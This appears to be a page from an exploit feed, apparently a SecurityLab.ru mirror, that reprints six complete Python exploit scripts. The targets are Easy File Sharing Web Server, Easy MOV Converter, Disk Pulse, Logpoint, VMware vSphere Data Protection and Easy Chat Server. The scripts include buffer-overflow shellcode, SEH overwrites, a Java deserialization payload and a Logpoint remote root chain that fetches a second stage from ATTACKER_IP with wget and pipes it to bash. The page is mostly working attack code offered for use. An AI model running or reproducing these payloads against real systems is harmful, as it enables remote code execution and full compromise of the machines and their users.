Exploits

Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow

SecurityLab.ru - Wed, 2017-06-14 03:00
#!/usr/bin/python # Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow # Author : Touhid M.Shaikh # Date : 12 June, 2017 # Contact: touhidshaikh22@gmail.com # Version: 7.2 # category: Remote Exploit # Tested on: Windows XP SP3 EN [Version 5.1.2600] """ ######## Description ######## What is Easy File Sharing Web Server 7.2 ? Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. ######## Video PoC and Article ######## https://www.youtube.com/watch?v=Mdmd-7M8j-M http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/ """ import httplib total = 4096 #Shellcode Open CMD.exe shellcode = ( "\x8b\xec\x55\x8b\xec" "\x68\x65\x78\x65\x2F" "\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8" "\xc7\x93\xc2\x77" "\xff\xd0") our_code = "\x90"*100 #NOP Sled our_code += shellcode our_code += "\x90"*(4072-100-len(shellcode)) # point Ret to Nop Sled our_code += "\x3c\x62\x83\x01" # Overwrite RET our_code += "\x90"*12 #Nop Sled our_code += "A"*(total-(4072+16)) # ESP pointing # Server address and POrt httpServ = httplib.HTTPConnection("192.168.1.6", 80) httpServ.connect() httpServ.request('POST', '/sendemail.ghp', 'Email=%s&getPassword=Get+Password' % our_code) response = httpServ.getresponse() httpServ.close() """ NOTE : After Exiting to cmd.exe our server will be crash bcz of esp Adjust esp by yourself ... hehhehhe... """ """ __ __| _ \ | | | |_ _| __ \ | | | | | | | | | | | | | | | ___ | | | | _| \___/ \___/ _| _|___|____/ Touhid M.Shaikh """
Categories: Exploits

Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)

SecurityLab.ru - Wed, 2017-06-14 02:57
#!/usr/bin/python ############################################################################### # Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH) # Date: 13-06-2017 # Exploit Author: @abatchy17 -- www.abatchy.com # Vulnerable Software: Easy MOV Converter # Vendor Homepage: http://www.divxtodvd.net/ # Version: 1.4.24 # Software Link: http://www.divxtodvd.net/easy_mov_converter.exe # Tested On: Windows 7 SP1 32bit # # Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911). # # To reproduce the exploit: # 1. Click Register # 2. In the "Enter User Name" field, paste the content of exploit.txt # ############################################################################## # If you're using WinXP SP3, change this to 996 buffer = "\x41" * 1008 nSEH = "\xeb\x10\x90\x90" # 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll) SEH = "\x5c\x14\x01\x10" badchars = "\x00\x0a\x0d" # and 0x80 to 0xff # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python buf = "" buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b" buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a" buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d" buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9" buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4" buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe" buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c" buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7" buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3" buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05" buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae" buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29" buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c" buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e" buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44" buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b" buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae" junk = "\x90" * 16 badchars = "\x0a\x0d" data = buffer + nSEH + SEH + junk + buf f = open ("exploit.txt", "w") f.write(data) f.close()
Categories: Exploits

Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow

SecurityLab.ru - Wed, 2017-06-14 02:56
#!/usr/bin/python ############################################################################### # Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow # Date: 12-06-2017 # Exploit Author: abatchy17 -- @abatchy17 # Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate) # Vendor Homepage: http://www.diskpulse.com/ # Version: 9.7.14 # Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate) # Tested On: Windows XP SP3 (x86), Win7 SP1 (x86) # # To trigger the exploit: # 1. Under Directories, click the plus sign # 2. Paste content of exploit.txt in Add Directory textbox. # # <--- Marry and reproduce ---> # ############################################################################## a = open("exploit.txt", "w") badchars = "\x0a\x0d\x2f" # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f" buf = "" buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43" buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b" buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63" buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37" buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55" buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f" buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70" buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c" buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37" buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51" buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32" buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61" buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69" buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d" buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33" buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76" buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47" buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50" buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50" buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f" buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53" buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50" buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30" buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65" buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d" buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a" buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50" buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63" buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54" buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41" # 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll) jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part) llamaleftovers = ( "\x55" # push EBP "\x58" # pop EAX "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 "\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200 "\x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode ) junk = "\x55" + "\x53\x5b" * 107 data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf a.write(data) a.close()
Categories: Exploits

Logpoint &lt; 5.6.4 - Unauthenticated Root Remote Code Execution

SecurityLab.ru - Mon, 2017-06-12 01:48
# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4 # Date: 11/06/17 # Exploit Author: agix # Vendor Homepage: https://www.logpoint.com # Version: logpoint < 5.6.4 # Tested on: 5.6.2 # Vendor contact 19/04 # Exploit details sent to the vendor 24/04 # Patch in test mode 05/05 # Patch release to public 08/05 # run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e # to get root code execution this is the second stage e # wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met # it downloads a third stage executed as root import time import zmq import sys import json import random import string import base64 ATTACKER_IP = '172.16.171.1' LOGPOINT_IP = '172.16.171.204' def crash(): context = zmq.Context() sock = context.socket(zmq.DEALER) sock.connect("tcp://%s:5504"%LOGPOINT_IP) sock.send('crash') crash() time.sleep(1) context = zmq.Context() sock2 = context.socket(zmq.DEALER) sock2.connect("tcp://%s:5504"%LOGPOINT_IP) name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP) cmd2 = base64.b64encode('cat /tmp/e') exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2) tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}}) print tosend sock2.send(tosend) print sock2.recv() time.sleep(30) # cleaning tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}}) print tosend sock2.send(tosend) print sock2.recv()
Categories: Exploits

VMware vSphere Data Protection 5.x/6.x - Java Deserialization

SecurityLab.ru - Mon, 2017-06-12 01:48
#!/usr/bin/env python import socket import sys import ssl def getHeader(): return '\x4a\x52\x4d\x49\x00\x02\x4b' def payload(): cmd = sys.argv[4] cmdlen = len(cmd) data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74' data2 += '\x00' + chr(cmdlen) data2 += cmd data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f' return data2 def sslMode(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL") def exploitTarget(sock): server_address = (sys.argv[1], int(sys.argv[2])) print 'connecting to %s port %s' % server_address sock.connect(server_address) print 'sending exploit headers\n' sock.send(getHeader()) sock.recv(8192) print 'sending exploit\n' sock.send(payload()) sock.close() print 'exploit completed.' if __name__ == "__main__": if len(sys.argv) != 5: print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd' print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"' sys.exit(0) else: sock = None if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True: sock = sslMode() if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) exploitTarget(sock)
Categories: Exploits

EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)

SecurityLab.ru - Mon, 2017-06-12 01:44
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH) # Date: 09/10/2017 # Software Link: http://echatserver.com/ecssetup.exe # Exploit Author: Aitezaz Mohsin # Vulnerable Version: v2.0 to v3.1 # Vulnerability Type: Buffer Overflow # Severity: Critical # Tested on: [Windows XP Sp3 Eng] # ====================================================================================================================== # Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability. # Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. # ====================================================================================================================== # USAGE: python exploit.py ip #!/usr/bin/python import os import sys import socket ip = sys.argv[1] socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) socket.connect((ip , 80)) #AlphanumericShellcode shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43" "\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41" "\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" "\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" "\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33" "\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44" "\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30" "\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a" "\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43" "\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47" "\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c" "\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43" "\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55" "\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39" "\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e" "\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50" "\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31" "\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31" "\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35" "\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30" "\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31" "\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a" "\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36" "\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f" "\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58" "\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34" "\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b" "\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d" "\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39" "\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50" "\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56" "\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45" "\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59" "\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f" "\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45" "\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50" "\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32" "\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57" "\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57" "\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46" "\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31" "\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f" "\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56" "\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45" "\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a" "\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c" "\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37" "\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f" "\x4e\x35\x41\x41") magic = "B" * 217 magic += "\xeb\x06\x90\x90" magic += "\xBC\x04\x01\x10" magic += shellcode magic += "C" * 200 buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n" buffer += "Host: 192.168.1.11" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 